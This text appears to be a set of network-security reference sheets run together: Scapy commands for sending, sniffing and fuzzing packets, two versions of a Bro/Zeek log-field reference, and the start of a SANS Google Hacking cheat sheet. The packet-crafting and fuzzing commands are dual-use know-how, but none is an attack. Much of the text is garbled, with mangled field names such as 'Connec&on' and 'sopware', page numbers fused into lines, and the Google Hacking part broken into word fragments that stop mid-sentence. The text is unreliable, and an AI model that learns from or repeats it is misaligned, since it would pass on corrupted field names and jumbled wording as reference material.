send(pkt, inter=0, loop=0, count=1, iface=N)Send one or more packets at layer three
sendp(pkt, inter=0, loop=0, count=1, iface=N)Send one or more packets at layer two
sendpfast(pkt, pps=N, mbps=N, loop=0, iface=N)Send packets much faster at layer two using tcpreplay
Sending and Receiving Packets
sr(pkt, filter=N, iface=N), srp(…)Send packets and receive replies
sr1(pkt, inter=0, loop=0, count=1, iface=N), srp1(…)Send packets and return only the first reply
srloop(pkt, timeout=N, count=N), srploop(…)Send packets in a loop and print each reply
Fuzzing
# Randomize fields where applicable>>> fuzz(ICMP()).show()###[ ICMP ]###
type= <RandByte>code= 227chksum= Noneunused= <RandInt>
Sniffing Packets
sniff(count=0, store=1, timeout=N)Record packets off the wire; returns a list of packets when stopped
# Capture up to 100 packets (or stop with ctrl-c)>>> pkts=sniff(count=100, iface="eth0")>>> pkts<Sniffed: TCP:92 UDP:7 ICMP:1 Other:0>
>>> send(IP(dst="192.0.2.1")/UDP(dport=53)).Sent 1 packets.>>> sendp(Ether()/IP(dst="192.0.2.1")/UDP(dport=53)).Sent 1 packets.
>>> srloop(IP(dst="packetlife.net")/ICMP(), count=3)RECV 1: IP / ICMP 174.143.213.184 > 192.168.1.140RECV 1: IP / ICMP 174.143.213.184 > 192.168.1.140RECV 1: IP / ICMP 174.143.213.184 > 192.168.1.140
3543
State Meaning S0 Connec&on a)empt seen, no reply S1 Connec&on established, not terminated (0 byte counts) SF Normal establish & termina&on (>0 byte counts) REJ Connec&on a)empt rejected S2 Established, ORIG a)empts close, no reply from RESP. S3 Established, RESP a)empts close, no reply from ORIG. RSTO Established, ORIG aborted (RST) RSTR Established, RESP aborted (RST) RSTOS0 ORIG sent SYN then RST; no RESP SYN-‐ACK RSTRH RESP sent SYN-‐ACK then RST; no ORIG SYN SH ORIG sent SYN then FIN; no RESP SYN-‐ACK (“half-‐open”) SHR RESP sent SYN-‐ACK then FIN; no ORIG SYN OTH No SYN, not closed. Midstream traffic. Par&al connec&on.
conn.log: conn_state
Field Type Descrip=on ts &me Measurement &mestamp ts_delta interval Time difference from previous
measurement peer string Name of the Bro instance repor&ng loss gaps count ACKs seen without seeing data being
ACKed acks count Total number of TCP ACKs percent_loss string gaps/acks, as a percentage. Es&mate of
loss.
capture_loss.log Estimate of packet loss
Field Type Descrip=on ts &me Timestamp of the DNS request
uid & id Underlying connec&on info -‐ See conn.log
proto proto Protocol of DNS transac&on – TCP or UDP
trans_id count 16 bit iden&fier assigned by DNS client; responses match
query string Domain name subject of the query
qclass count Value specifying the query class
qclass_name string Descrip&ve name of the query class (e.g. C_INTERNET)
qtype count Value specifying the query type
qtype_name string Name of the query type (e.g. A, AAAA, PTR)
rcode count Response code value in the DNS response
rcode_name string Descrip&ve name of the response code (e.g. NOERROR, NXDOMAIN)
QR bool Was this a query (T) or a response (F)?
AA bool T: server is authorita&ve for query
TC bool T: message was truncated
RD bool Recursion Desired. T = request recursive lookup of query
RA bool Recursion Available. T = server supports recursive queries
Z count Reserved field, should be zero in all queries & responses
answers vector List of resource descrip&ons in answer to the query
TTLs vector Caching intervals of the answers
rejected bool Whether the DNS query was rejected by the server
dns.log DNS query/response details
Field Type Descrip=on ts &me Timestamp uid string Unique ID of Connec&on id.orig_h addr Origina&ng endpoint’s IP address (AKA ORIG) id.orig_p port Origina&ng endpoint’s TCP/UDP port (or ICMP code) id.resp_h addr Responding endpoint’s IP address (AKA RESP) id.resp_p port Responding endpoint’s TCP/UDP port (or ICMP code) proto proto Transport layer protocol of connec&on service string Dynamically detected applica&on protocol, if any dura=on interval Connec&on length orig_bytes count Originator payload bytes; from sequence numbers if TCP resp_bytes count Responder payload bytes; from sequence numbers if TCP conn_state string Connec&on state (see conn.log: conn_state table) local_orig bool If conn originated locally T; if remotely F.
If Site::local_nets empty, always unset. missed_bytes count Number of missing bytes in content gaps history string Connec&on state history (see conn.log: history table) orig_pkts count Number of ORIG packets orig_ip_bytes count Number of ORIG IP bytes (via IP total_length header field) resp_pkts count Number of RESP packets resp_ip_bytes count Number of RESP IP bytes (via IP total_length header field) tunnel_parents set If tunneled, connec&on UID of encapsula&ng parent (s) orig_cc string ORIG GeoIP Country Code resp_cc string RESP GeoIP Country Code
conn.log IP, TCP, UDP and ICMP connection details
LeQer Meaning S a SYN without the ACK bit set H a SYN-‐ACK (“handshake”) A a pure ACK D packet with payload (“data”) F packet with FIN bit set R packet with RST bit set C packet with a bad checksum I Inconsistent packet (Both SYN & RST)
conn.log: history Orig UPPERCASE, Resp lowercase, uniq-ed
Field Type Descrip=on ts &me Timestamp of request uid & id Underlying connec&on info -‐ See conn.log mac string Client’s hardware address assigned_ip addr Client’s actual assigned IP address lease_=me interval IP address lease &me trans_id count Iden&fier assigned by the client; responses
match
dhcp.log DHCP lease activity
Version: 2.0 1 © Broala LLC.
Bro 2.3 Logs www.broala.com
3644
Field Type Descrip=on ts &me Timestamp when file was first seen
fuid string Unique iden&fier for a single file
tx_hosts set if transferred via network, host(s) that sourced the data
rx_hosts set if transferred via network, host(s) that received the data
conn_uids set Connec&on UID(s) over which the file was transferred
source string An iden&fica&on of the source of the file data
depth count Depth of file related to source; eg: SMTP MIME a)achment depth; HTTP depth of the request
analyzers set Set of analysis types done during file analysis
mime_type string The file type, as determined by Bro’s signatures
filename string If available, filename from source; frequently the “Content-‐Disposi&on” headers in network protocols
dura=on interval The dura&on the file was analyzed for
local_orig bool If transferred via network, did data originate locally?
is_orig bool If transferred via network, was file sent by the originator?
seen_bytes count Number of bytes provided to file analysis engine
total_bytes count Total number of bytes that should comprise the file
missing_bytes count Number of bytes in the file stream missed; eg: dropped packets
overflow_bytes count Number of not all-‐in-‐sequence bytes in the file stream delivered to file analyzers due to reassembly buffer overflow
=medout bool If the file analysis &me out at least once per file
parent_fuid string ID associated with a container file from which this one was extracted as a part of the analysis
md5/sha1/sha256
string MD5/SHA1/SHA256 hash of file, if enabled
extracted string Local filename of extracted files, if enabled
files.log File analysis results
Field Type Descrip=on ts &me Timestamp uid & id Underlying connec&on info -‐ See conn.log fc_request string The name of the request func&on message fc_reply string The name of the reply func&on message iin count Response’s “internal indica&on number”
dnp3.log Distributed Network Protocol (industrial control)
Field Type Descrip=on ts &me Timestamp
uid & id Underlying connec&on info -‐ See conn.log
nick string Nickname given for this connec&on
user string Username given for this connec&on
command string Command given by the client
value string Value for the command given by the client
addl string Any addi&onal data for the command
dcc_file_name string DCC filename requested
dcc_file_size count Size of the DCC transfer as indicated by the sender
dcc_mime_type string Sniffed mime type of the file
fuid string File unique ID
irc.log IRC communication details
Field Type Descrip=on ts &me Command &mestamp uid & id Underlying connec&on info -‐ See conn.log user string Username for current FTP session password string Password for current FTP session command string Command issued by the client arg string Command argument if present mime_type string Libmagic sniffed file type if there’s a file transfer file_size count Size of transferred file reply_code count Reply code from server in response to the command reply_msg string Reply message from server in response to the command data_channel record Informa&on about the data channel (orig, resp, is passive) fuid string File unique ID
ftp.log FTP request/reply details
Field Type Descrip=on ts &me Timestamp of hit uid & id Underlying connec&on info -‐ See conn.log fuid string The UID for a file associated with this hit, if any file_mime_type string A mime type if the hit is related to a file file_desc string Addi&onal context for file, if available seen.indicator string The intelligence indicator seen.indicator_type string The type of data the indicator represents seen.where string Where the data was discovered sources set Sources which supplied data for this match
intel.log Hits on indicators from the intel framework
Field Type Descrip=on ts &me Timestamp of request uid & id Underlying connec&on info -‐ See conn.log trans_depth count Pipelined depth into the connec&on
method string HTTP Request verb: GET, POST, HEAD, etc. host string Value of the HOST header uri string URI used in the request referrer string Value of the “referer” header user_agent string Value of the User-‐Agent header request_ body_len
count Actual uncompressed content size of the data transferred from the client
response_ body_len
count Actual uncompressed content size of the data transferred from the server
status_code count Status code returned by the server status_msg string Status message returned by the server info_code count Last seen 1xx info reply code by server info_msg string Last seen 1xx info reply message by server filename string Via the Content-‐Disposi&on server header tags set Indicators of various a)ributes discovered
username string If basic-‐auth is performed for the request password string If basic-‐auth is performed for the request proxied set Headers that might indicate a proxied request orig_fuids vector An ordered vector of file unique IDs from orig orig_mime_types vector An ordered vector of mime types from orig resp_fuids vector An ordered vector of file unique IDs from resp resp_mime_types vector An ordered vector of mime types from resp
http.log HTTP request/reply details
Version: 2.0 2 © Broala LLC.
Bro 2.3 Logs www.broala.com
3745
Field Type Descrip=on ts &me Timestamp uid & id Underlying connec&on info -‐ See conn.log fuid string File unique iden&fier file_mime_type string The file type, as determined by Bro’s
signatures file_desc string Addi&onal context for file, if available proto proto Transport protocol note string The type of the no&ce msg string Human readable message for the no&ce sub string Sub-‐message for the no&ce src addr Source address dst addr Des&na&on address p port Associated port, if any n count Associated count or status code peer_descr string Descrip&on for peer that raised this no&ce ac=ons set Ac&ons applied to this no&ce suppress_for interval Length of &me dupes should be suppressed dropped bool If the src IP was blocked
notice.log Logged notices
Field Type Descrip=on ts &me Timestamp when the message was first seen uid & id Underlying connec&on info -‐ See conn.log trans_depth count Transac&on depth if there are mul&ple msgs helo string Contents of the HELO header mailfrom string Contents of the MAIL FROM header rcpQo set Contents of the RCPT TO header date string Contents of the DATE header from string Contents of the FROM header to set Contents of the TO header reply_to string Contents of the ReplyTo header msg_id string Contents of the MsgID header in_reply_to string Contents of the In-‐Reply-‐To header subject string Contents of the Subject header x_origina=ng_ip addr Contents of the X-‐Origina&ng-‐IP header first_received string Contents of the first Received header second_received string Contents of the second Received header last_reply string Last server to client message path vector Message transmission path, from headers user_agent string Value of the client User-‐Agent header fuids vector File unique IDs seen a)ached to this msg is_webmail bool If the message was sent via webmail
smtp.log SMTP transactions
Field Type Descrip=on ts &me Timestamp of the authen&ca&on a)empt uid & id Underlying connec&on info -‐ See conn.log username string The username of the user a)emp&ng to auth mac string The MAC address of the client (e.g. for wireless) remote_ip addr The IP address of the client (e.g. for VPN) connect_info string Addi&onal connect informa&on, if available result string Whether the a)empt succeeded or failed
radius.log RADIUS authentication attempts
Field Type Descrip=on
ts &me Timestamp of request
uid & id Underlying connec&on info -‐ See conn.log
version count Protocol version of SOCKS
user string Username for the proxy, if available
status string Server status for the a)empt using proxy
request.host addr Client requested address
request.name string Client requested name
request_p port Client requested port
bound.host addr Server bound address
bound.name string Server bound name
bound_p port Server bound port
socks.log SOCKS proxy requests
Field Type Descrip=on ts &me Timestamp of the detec&on
host addr IP address running the sopware
host_p port Port on which the sopware is running (for servers)
so[ware_type string Type of sopware (e.g. HTTP::SERVER)
name string Name of the sopware
version.major count Major version number of the sopware
version.minor count Minor version number of the sopware
version.minor2 count Minor subversion number of the sopware
version.minor3 count Minor update number of the sopware
version.addl string Addi&onal version string (e.g. beta42)
unparsed_version string The full, unparsed version of the sopware
software.log Software identified by the software framework
Version: 2.0 3
Field Type Descrip=on ts &me Timestamp when the message was first seen uid & id Underlying connec&on info -‐ See conn.log dura=on interval Time between the first and last seen packet version string SNMP version (v1, v2c, v3) community string The community string of the first SNMP packet get_requests count Number of GetRequest/GetNextRequest packets get_bulk_requests count Number of GetBulkRequest packets get_responses count Number of GetResponse/Response packets set_requests count Number of SetRequest packets display_string string A system descrip&on of the responder up_since &me Timestamp the responder has been up since
snmp.log SNMP messages
© Broala LLC.
Field Type Descrip=on ts &me Timestamp of request uid & id Underlying connec&on info -‐ See conn.log func string Func&on message that was sent excep=on string Excep&on if there was a failure
modbus.log PLC requests (industrial control)
Bro 2.3 Logs www.broala.com
3846
Field Type Descrip=on ts &me Timestamp when the SSL connec&on was detected uid & id Underlying connec&on info -‐ See conn.log version string SSL version that the server offered cipher string SSL cipher suite that the server chose curve string Ellip&c curve the server chose if using ECDH/ECDHE server_name string Value of the Server Name Indicator SSL extension session_id string Session ID offered by client for session resump&on last_alert string Last alert that was seen during the connec&on established bool Was this connec&on established successfully? cert_chain vector Chain of cer&ficates offered by the server cert_chain_fuids vector File unique IDs for certs in cert_chain. See files.log client_cert_chain vector Chain of cer&ficates offered by the client client_cert_chain_fuids vector File UIDs for certs in client_cert_chain. See files.log subject string Subject of the X.509 cert offered by the server issuer string Subject of the signer of the server cert client_subject string Subject of the X.509 cert offered by the client client_issuer_subject string Subject of the signer of the client cert valida=on_status string Cer&ficate valida&on result for this handshake ocsp_status string Result of OCSP valida&on for this handshake ocsp_response string OCSP response as a string
ssl.log SSL handshakes
Bro 2.3 Logs
Field Type Descrip=on ts &me Time when the cert was seen
id string File unique ID. See files.log
cer=ficate.version count Version number
cer=ficate.serial string Serial number
cer=ficate.issuer string Issuer
cer=ficate.not_valid_before &me Time before when the cert is invalid
cer=ficate.not_valid_a[er &me Time aper when the cert is invalid
cer=ficate.key_alg string Name of the key algorithm
cer=ficate.sig_alg string Name of the signature algorithm
cer=ficate.key_type string Key type (either RSA, DSA or EC)
cer=ficate.key_length count Key length, in bits
cer=ficate.exponent string Exponent, if RSA
cer=ficate.curve string Curve, if EC
san.dns string_vec List of DNS entries in Subject Alterna&ve Name (SAN)
san.uri string_vec List of URI entries in SAN
san.email string_vec List of email entries in SAN
san.ip addr_vec List of IP entries in SAN
basic_constraints.ca bool CA flag set?
basic_constraints.path_len count Maximum path length
x509.log SSL certificate details
Field Type Descrip=on
ts &me Timestamp of message
uid & id Underlying connec&on info -‐ See conn.log name string The name of the weird that occurred addl string Addi&onal informa&on accompanying the weird, if any no=ce bool Indicate if this weird was also turned into a no&ce peer string The peer that generated this weird
weird.log Anomalies and protocol violations
© Broala LLC. Version: 2.0
Field Type Descrip=on ts &me Timestamp when the SSH connec&on was detected uid & id Underlying connec&on info -‐ See conn.log status string If the login was heuris&cally guessed to be “success” or “failure”. direc=on string Outbound or inbound connec&on client string Sopware string from the client server string Sopware string from the server resp_size count Amount of data returned by the server
ssh.log SSH handshakes
Field Type Descrip=on ts &me Timestamp tunnel was detected uid & id Underlying connec&on info -‐ See conn.log tunnel_type string The type of tunnel (e.g. Teredo, IP) ac=on string The ac&vity that occurred (discovered, closed)
tunnel.log Details of encapsulating tunnels
4
Log Descrip=on app_stats Sta=s=cs on usage of popular web apps cluster Diagnos=cs for cluster opera=on communica=on Diagnos=cs for inter-‐process communica=ons dpd Diagnos=cs for dynamic protocol detec=on known_certs Observed local SSL certs. Each is logged once/day known_devices Observed local devices. Each is logged once/day known_hosts Observed local ac=ve IPs. Each is logged once/day known_services Observed local services. Each is logged once/day loaded_scripts A list of scripts that were loaded at startup packet_filter Any filters to limit the traffic being analyzed stats Diagnos=cs such as mem usage, packets seen, etc. syslog Syslog messages traceroute Hosts running traceroute
Other Logs
www.broala.com
In order to promote its wide distribu&on, this work is licensed under the Crea&ve Commons A)ribu&on-‐NonCommercial-‐ShareAlike 4.0 Interna&onal License (h)p://crea&vecommons.org/licenses/by-‐nc-‐sa/4.0/). We at Broala are commi)ed to helping you understand Bro to the fullest so you can be a monitoring hero.
Field Type Descrip=on
ts &me Message &mestamp, if available (0 otherwise)
level string Message severity (Info, warning, error, etc.)
message string Message text
loca&on string The script loca&on where the event occurred, if available
reporter.log Bro internal errors and warnings
3947
State Meaning
S0 Connection attempt seen, no reply
S1 Connection established, not terminated (0 byte counts)
SF Normal establish & termination (>0 byte counts)
REJ Connection attempt rejected
S2 Established, ORIG attempts close, no reply from RESP.
S3 Established, RESP attempts close, no reply from ORIG.
RSTO Established, ORIG aborted (RST)
RSTR Established, RESP aborted (RST)
RSTOS0
ORIG sent SYN then RST; no RESP SYN-ACK
RSTRH RESP sent SYN-ACK then RST; no ORIG SYN
SH ORIG sent SYN then FIN; no RESP SYN-ACK (“half-open”)
SHR RESP sent SYN-ACK then FIN; no ORIG SYN
OTH No SYN, not closed. Midstream traffic. Partial connection.
conn.log: conn_state
Field Type Description
ts time Measurement timestamp
ts_delta interval Time difference from previous measurement
peer string Name of the Bro instance reporting loss
gaps count ACKs seen without seeing data being ACKed
acks count Total number of TCP ACKs
percent_loss string gaps/acks, as a percentage. Estimate of loss.
capture_loss.log
Estimate of packet loss
Field Type Description
ts time Timestamp of the DNS request
uid string Unique id of the connection
id record
ID record with orig/resp host/port. See conn.log
proto proto Protocol of DNS transaction – TCP or UDP
trans_id count 16 bit identifier assigned by DNS client; responses match
query string Domain name subject of the query
qclass count Value specifying the query class
qclass_name string Descriptive name of the query class (e.g. C_INTERNET)
qtype count Value specifying the query type
qtype_name string Name of the query type (e.g. A, AAAA, PTR)
rcode count Response code value in the DNS response
rcode_name string Descriptive name of the response code (e.g. NOERROR, NXDOMAIN)
QR bool Was this a query or a response? T = response, F = query
AA bool Authoritative Answer. T = server is authoritative for query
TC bool Truncation. T = message was truncated
RD bool Recursion Desired. T = request recursive lookup of query
RA bool Recursion Available. T = server supports recursive queries
Z count Reserved field, should be zero in all queries & responses
answers vector List of resource descriptions in answer to the query
TTLs vector Caching intervals of the answers
rejected bool Whether the DNS query was rejected by the server
dns.log
DNS query/response details
Field Type Description
ts time Timestamp
uid string Unique ID of Connection
id.orig_h addr Originating endpoint’s IP address (AKA ORIG)
id.orig_p port Originating endpoint’s TCP/UDP port (or ICMP code)
id.resp_h addr Responding endpoint’s IP address (AKA RESP)
id.resp_p port Responding endpoint’s TCP/UDP port (or ICMP code)
proto transport_proto
Transport layer protocol of connection
service string Dynamically detected application protocol, if any
duration interval Time of last packet seen – time of first packet seen
orig_bytes count Originator payload bytes; from sequence numbers if TCP
resp_bytes count Responder payload bytes; from sequence numbers if TCP
conn_state string Connection state (see conn.log:conn_state table)
local_orig bool If conn originated locally T; if remotely F. If Site::local_nets empty, always unset.
missed_bytes count Number of missing bytes in content gaps
history string Connection state history (see conn.log:history table)
orig_pkts count Number of ORIG packets
orig_ip_bytes count Number of ORIG IP bytes (via IP total_length header field)
resp_pkts count Number of RESP packets
resp_ip_bytes count Number of RESP IP bytes (via IP total_length header field)
tunnel_parents set If tunneled, connection UID of encapsulating parent (s)
orig_cc string ORIG GeoIP Country Code
resp_cc string RESP GeoIP Country Code
conn.log
IP, TCP, UDP and ICMP connection details
Letter Meaning
S a SYN without the ACK bit set
H a SYN-ACK (“handshake”)
A a pure ACK
D packet with payload (“data”)
F packet with FIN bit set
R packet with RST bit set
C packet with a bad checksum
I Inconsistent packet (Both SYN & RST)
conn.log: history
Orig UPPERCASE, Resp lowercase, uniq-ed
Bro Logs
Field Type Description
ts time Timestamp of request
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
mac string Client’s hardware address
assigned_ip addr Client’s actual assigned IP address
lease_time interval IP address lease time
trans_id count Identifier assigned by the client; responses match
dhcp.log
DHCP lease activity
app_stats.log
Statistics on usage of popular web apps
Field Type Description
ts time Measurement timestamp
ts_delta interval Time difference from previous measurement
app string Name of application (YouTube, Netflix, etc.)
uniq_hosts count Number of unique hosts that used app
hits count Number of visits to app
bytes count Total bytes transferred to/from app
Version: 2.3 1
www.CriticalStack.com
© 2014 Critical Stack LLC. All rights reserved. 4048
Field Type Description
ts time Timestamp first seen
host addr IP Address of host
known_hosts.log
Observed local active IPs; logged 1xDay
Field Type Description
ts time Timestamp
host addr Host address on which the service is running
port_num port Port number on which the service is running
port_proto transport _proto
Transport-layer protocol service uses
service set Set of protocol(s) that match the service’s connection payloads
known_services.log
Observed local services; logged 1xDay
Field Type Description
ts time Timestamp
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
fuid string File unique identifier
file_mime_type string Libmagic sniffed file type
file_desc string Additional context for file, if available
proto transport_proto
Transport protocol
note string The type of the notice
msg string Human readable message for the notice
sub string Sub-message for the notice
src addr Source address
dst addr Destination address
p port Associated port, if any
n count Associated count or status code
peer_descr string Description for peer that raised this notice
actions set Actions applied to this notice
suppress_for interval Length of time dupes should be suppressed
dropped bool If the src IP was blocked
notice.log
Logged notices
Bro Logs
Field Type Description
ts time Measurement timestamp
host addr Address that offered the certificate
port_num port If server, port that server listening on
subject string Certificate subject
issuer_subject string Certificate issuer subject
serial string Serial number for the certificate
known_certs.log
Observed local Certs; logged 1xDay
Field Type Description
ts time Timestamp when the message was first seen
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
trans_depth count Depth of message transaction if multiple messages transferred
helo string Contents of the HELO header
mailfrom string Contents of the MAIL FROM header
rcptto set Contents of the RCPT TO header
date string Contents of the DATE header
from string Contents of the FROM header
to set Contents of the TO header
reply_to string Contents of the ReplyTo header
msg_id string Contents of the MsgID header
in_reply_to string Contents of the In-Reply-To header
subject string Contents of the Subject header
x_originating_ip addr Contents of the X-Originating-IP header
first_received string Contents of the first Received header
second_received string Contents of the second Received header
last_reply string Last message that the server sent to the client
path vector Message transmission path, extracted from the headers
user_agent string Value of the User-Agent header from the client
tls bool Connection has switched to using TLS
fuids vector File unique IDs seen attached to this message
is_webmail bool Indicates if the message was sent through a webmail interface
smtp.log
SMTP transactions
Field Type Description ts time Timestamp of request
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
func string Function message that was sent
exception string Exception if there was a failure
modbus.log
PLC requests (industrial control)
Field Type Description
ts time Message timestamp
level string Message severity (Info, warning, error, etc.)
message string Message text
location string The script location where tevent occurred, if available
reporter.log
Bro internal errors and warnings
Version: 2.3 3
www.CriticalStack.com
Field Type Description
ts time Timestamp of the detection
uid string Unique ID for the connection
id conn_id ID record with orig/resp host/port. See conn.log
username string The username, if present
mac string MAC address, if present
remote_ip addr Remtoe IP address, if present
connect_info string Connect info, if present
result string Successful or failed authentication
logged bool Whether this has already been logged & ignored
radius.log
Radius authentication details
© 2014 Critical Stack LLC. All rights reserved. 4149
Field Type Description
ts time Timestamp when the SSL connection was detected
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
version string SSL version that the server offered
cipher string SSL cipher suite that the server chose
server_name string Value of the Server Name Indicator SSL extension
session_id string Session ID offered by the client for session resumption
subject string Subject of the X.509 cert offered by the server
issuer_subject string Signer Subject of the cert offered by the server
not_valid_before time NotValidBefore field value from the server cert
not_valid_after time NotValidAfter field value from the server cert
last_alert string Last alert that was seen during the connection
client_subject string Subject of the X.509 cert offered by the client
clnt_issuer_subject string Subject of the signer of the cert offered by the client
cert_hash string MD5 hash of the raw server certificate
validation_status vector Certificate validation for this connection
ssl.log
SSL handshakes (v2.2 only; v2.3 x509.log)
Bro Logs
Version: 2.3
Field Type Description
ts time Timestamp when the SSH connection was detected
uid string Connection unique ID
id record ID record with orig/resp host/port. See conn.log
status string If the login was heuristically guessed to be a “success” or a “failure”.
direction string Outbound or inbound connection
client string Software string from the client
server string Software string from the server
resp_size count Amount of data returned by the server
ssh.log
SSH handshakes
4
www.CriticalStack.com
Field Type Description
ts time Timestamp of request
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
version count Protocol version of SOCKS
user string Username for proxy, if available
status string Server status for the attempt using proxy
request.host addr Client requested address
request.name string Client requested name
request_p port Client requested port
bound.host addr Server bound address
bound.name string Server bound name
bound_p port Server bound port
socks.log
SOCKS proxy requests
Field Type Description
ts time Timestamp of the detection
host addr IP address running the software
host_p port Port on which the software is running (for servers)
software_type string Type of software (e.g. HTTP::SERVER)
name string Name of the software
version.major count Major version number of the software
version.minor count Minor version number of the software
version.minor2 count Minor subversion number of the software
version.minor3 count Minor update number of the software
version.addl string Additional version string (e.g. beta42)
unparsed_version string The full, unparsed version of the software
software.log
Software identified by the software framework
Field Type Description
ts time Timestamp of match
src_addr addr Host triggering the signature match event
src_port port Host port on which the match occurred
dst_addr addr Host which was sent the matching payload
dst_port port Port which was sent the matching payload
note string Notice associated with the signature event
sig_id string Name of the signature that matched
event_msg string More descriptive message of the event
sub_msg string Extracted payload data or extra message
sig_count count Number of sigs
host_count count Number of hosts
signatures.log
Matches from the signature framework
Field Type Description ts time Timestamp tunnel was detected
uid string Connection unique id
id conn_id ID record with orig/resp host/port. See conn.log
duration interval Amount of time between first/latest packet in session
version string The version of SNMP being used
community string Community string of the first SNMP packet associated w/ session; v1 & v2c only
get_requests count Number of variable bindings in GetRequest/Next
get_bulk_requests count Number of variable bindings in GetBulkRequest PDU
get_responses count Number of variable bindings in GetResponse/Response PDUs
set_requests count Number of variable bindings in SetRequest PDUs
display_string string System description of the SNMP responder endpoint
up_since time Time the SNMP responder claims it has been up since
snmp.log
SNMP communication
Description
Error / output logging - LogAscii::output_to_stdout = F &redef
stderr.log / stdout.log
Field Type Description
ts time Timestamp when the message was seen
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
proto transport_proto
Protocol over which message was seen. Only UDP is currently supported.
facility string Syslog facility for the message
severity string Syslog severity for the message
message string The plain text syslog message
syslog.log
Syslog messages
© 2014 Critical Stack LLC. All rights reserved. 4250
Version: 2.3 5
www.CriticalStack.com
Log Page Description
app_stats 1 Statistics on usage of popular web apps
capture_loss 1 Estimate of packet loss
cluster Diagnostics for cluster operation
communication Diagnostics for inter-process communications
conn 1 IP, TCP, UDP and ICMP connection details
dhcp 1 DHCP lease activity
dnp3 2 Distributed Network Protocol (industrial control)
dns 1 DNS query/response details
dpd Diagnostics for dynamic protocol detection
files 2 File analysis results
ftp 2 FTP request/reply details
http 2 HTTP request/reply details
intel 2 Hits on indicators from the intel framework
irc 2 IRC communication details
known_certs 3 Observed local SSL certs. Each is logged once/day
known_devices Observed local devices. Each is logged once/day
known_hosts 3 Observed local active IPs. Each is logged once/day
known_services 3 Observed local services. Each is logged once/day
loaded_scripts A list of scripts that were loaded at startup
modbus 3 PLC requests (industrial control)
notice 3 Logged notices
packet_filter Any filters to limit the traffic being analyzed
radius 3 radius authentication details
reporter 3 Internal errors and warnings
signatures 4 Matches from the signatures framework
smtp 3 SMTP transactions
snmp 4 SNMP communication
socks 4 SOCKS proxy requests
software 4 Software identified by the software framework
ssh 4 SSH handshakes
ssl 4 SSL handshakes (v2.2 only; v2.3 x509.log)
stats Diagnostics such as mem usage, packets seen, etc.
stderr / stdout 4 Output logging
syslog 4 Syslog messages
traceroute 5 Hosts running traceroute
tunnel 5 Details of encapsulating tunnels
x509 5 x509 Certificate Analyzer Output
weird 5 Anomalies and protocol violations
Index
Field Type Description
ts time Timestamp of the detection
id String File id of this certificate
certificate . record Certificate details
.version count Version number
.serial string Serial number
.issuer string Certificate issuer
.not_valid_before time Timestamp before when certificate is not valid
.not_valid_after time Timestamp after when certificate is not valid
.key_alg string Name of the key algorithm
.sig_alg string Name of the signature algorithm
.key_type string Key type, if key parseable openssl (rsa, dsa or ec)
.key_length count Key length in bits
.exponent string Exponent, if RSA-certificate
.curve string Curve, if EC-certificate
san. record Subject Alternative Name
.dns string_vec List of DNS entries in the SAN
.uri string_vec List of URI entries in the SAN
.email string_vec List of email entries in the SAN
.ip addr_vec List of IP entries in the SAN
.other_fields bool True if certificate contained other, unrecognized fields
basicconstraints. record Basic constraints extension of the certificate
.ca bool CA fla set?
.path_len count Maximum path length
logcert bool T (present if policy/protocols/ssl/log-hostcerts-only.bro)
x509.log
x509 Certificate Analyzer Output
Field Type Description
ts time Timestamp of message
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
name string The name of the weird that occurred
addl string Additional information accompanying the weird, if any
notice bool Indicate if this weird was also turned into a notice
peer string The peer that generated this weird
weird.log
Anomalies and protocol violations
Field Type Description
ts time Timestamp traceroute was detected
src addr Address initiating the traceroute
dst addr Destination address of the traceroute
proto string Protocol used for the traceroute
traceroute.log
Hosts running traceroute
Field Type Description ts time Timestamp tunnel was detected
uid string Connection unique id
id record ID record with orig/resp host/port. See conn.log
tunnel_type string The type of tunnel (e.g. Teredo, IP)
action string The activity that occurred (discovered, closed)
tunnel.log
Details of encapsulating tunnels
Bro Logs
Command Description Phone: 202-559-5200
Email: [email protected]
Web: http://www.CriticalStack.com
Git: https://github.com/CriticalStack/
Twitter: @CriticalStack
pgp 0xc255d63501b80df9
Contact Critical Stack
© 2014 Critical Stack LLC. All rights reserved. 4351
Goog
leHa
ckin
g an
d De
fens
eCh
eat
Shee
tPO
CKET
REFE
REN
CEG
UID
E
SANS
Stay
Shar
p Pro
gram
http
://
ww
w.s
ans.
org
http
://
ww
w.s
ans.
org/
stay
shar
p
©S
AN
S Ins
titu
te 2
006
Pur
pose
This
doc
umen
t ai
ms
to b
e a
quic
k re
fere
nce
outlin
ing
all G
oogl
e op
erat
ors,
the
irm
eani
ng,
and
exam
ples
of
thei
r us
age.
Wha
t to
use
thi
s sh
eet
for
Use
thi
s sh
eet
as a
han
dy r
efer
ence
tha
t ou
tlin
es t
heva
riou
s G
oogl
e se
arch
es t
hat
you
can
perf
orm
. It is
mea
nt t
o su
ppor
t yo
u th
roug
hout
the
Goo
gle
Hac
king
and
Def
ense
cou
rse
and
can
be u
sed
as a
qui
ckre
fere
nce
guid
e an
d re
fres
her
on a
ll G
oogl
e ad
vanc
edop
erat
ors
used
in
this
cou
rse.
The
stu
dent
cou
ld a
lso
use
this
she
et a
s gu
idan
ce in
build
ing
inno
vative
oper
ator
com
bina
tion
s an
d ne
w s
earc
h te
chni
ques
.
This
she
et is
split
int
o th
ese
sect
ions
:
• O
pera
tor
Exa
mpl
es
• A
dvan
ced
Ope
rato
rs
• N
umbe
r S
earc
hing
• C
alcu
lato
r O
pera
tors
• S
earc
h Par
amet
ers
Ref
eren
ces:
http
://w
ww.g
oogl
e.co
m/i
ntl/
en/h
elp/
refin
esea
rch.
htm
lht
tp:/
/joh
nny.
ihac
kstu
ff.c
omht
tp:/
/ww
w.g
oogl
e.co
m/i
ntl/
en/h
elp/
chea
tshe
et.h
tml
Ope
rato
r Exa
mpl
e Fi
nds
Pag
es C
onta
inin
g
sailb
oat
ches
apea
ke b
ayth
e w
ords
sai
lboa
t, C
hesa
peak
e an
dB
ay
sloo
p O
Rya
wl
eith
er t
he w
ord
sloo
por
the
wor
d ya
wl
“To
each
his
ow
n”th
e ex
act
phra
se t
o ea
ch h
is o
wn
viru
s -c
ompu
ter
the
wor
d vi
rus
but
NO
T th
e w
ord
com
pute
r
Sta
r W
ars
Epi
sode
+III
Th
